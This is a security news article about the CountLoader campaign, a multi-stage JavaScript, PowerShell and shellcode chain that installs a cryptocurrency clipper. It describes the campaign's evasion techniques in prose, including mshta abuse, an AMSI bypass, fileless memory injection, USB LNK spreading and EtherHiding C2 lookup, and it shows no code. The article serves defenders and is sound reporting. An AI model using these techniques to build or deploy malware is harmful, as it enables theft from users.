Malware Campaign Uses JavaScript, PowerShell, and Shellcode to Deliver Crypto Clipper

A wave of well-crafted malware is quietly draining cryptocurrency from users across the globe, and the attackers behind it have gone to great lengths to stay hidden.

Researchers have uncovered a large-scale campaign built around a multi-stage loader called CountLoader, which chains together JavaScript, PowerShell, and shellcode to deliver a payload that intercepts and redirects cryptocurrency transactions.

The scope of this campaign is striking, with tens of thousands of machines now infected across multiple continents. The malware does not rely on a single trick.

It starts with a malicious EXE file that runs a PowerShell command, pulling down an obfuscated JavaScript loader and executing it through mshta.exe, a legitimate Windows utility that attackers frequently abuse because the operating system trusts it by default.

This lets the malware blend into normal activity, giving it time to settle in before any defenses can respond.

Analysts at McAfee Labs, who authored the research and shared details in a report with Cyber Security News (CSN), noted that the campaign reached roughly 86,000 unique infected machines.

On average, around 5,000 infected systems were connecting to command-and-control infrastructure every single minute. Infections were highest in India, followed by Indonesia and the United States, with a strong presence across Southeast Asia.

Beyond internet-based delivery, the malware also spreads through USB drives. When instructed by its command server, CountLoader replaces files on connected external drives with LNK shortcut files.

Malware Campaign Deliver Crypto Clipper

Opening one silently runs the malware while also opening the original file, so victims notice nothing unusual. About 9,000 infections were traced back to this USB-based method.

The end goal is a cryptocurrency clipper. Once loaded into memory, it monitors the clipboard in the background.

The moment a user copies a wallet address, the clipper replaces it with one controlled by the attacker, silently rerouting funds with no visible warning to the victim.

The infection chain is designed to avoid detection at every stage. After the initial EXE runs, a scheduled task fires every 30 minutes to maintain persistence from the very first step.

The PowerShell script then decodes a Base64 payload and runs it using Invoke-Expression, a common technique for executing hidden code without writing anything to disk.

CountLoader then takes control as an HTA file loaded through mshta.exe. It hides its window, attempts to erase its own file if run locally, and cycles through command servers until one responds.

Once connected, it performs an encrypted handshake, grabs a JWT token, and sends back details about the infected host, including any installed cryptocurrency wallets or browser extensions.

The next stages involve a PowerShell packer that decrypts and launches a shellcode injector. Before injecting, the script disables AMSI, a Windows feature designed to catch malicious scripts, using a known public bypass.

The shellcode then loads the final payload directly into memory under systeminfo.exe, never touching the disk, making it significantly harder for security tools to detect.

Cryptocurrency Clipper Delivered via EtherHiding

What sets the final payload apart is how it locates its command server. Rather than hard-coding a domain that can be blocked or taken down, the clipper uses a technique called EtherHiding, fetching the server address straight from the Ethereum blockchain.

Since the blockchain is decentralized, there is no single point defenders can shut down to cut the malware off.

Once the server address is retrieved, the clipper silently monitors clipboard contents and supports multiple cryptocurrency formats, meaning it can swap Bitcoin, Ethereum, and other wallet addresses without the victim noticing.

Researchers measured the true scale of this campaign by registering a backup C2 domain and sinkholing infected traffic to their own server, effectively turning the attackers’ infrastructure against them.

To reduce risk, users should avoid running EXE files from untrusted sources, treat unknown USB drives with caution, and always verify wallet addresses before sending cryptocurrency.

Watching for unfamiliar scheduled tasks on Windows and keeping security software updated can also help detect this threat before serious damage is done.

Indicators of Compromise (IoCs):-

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.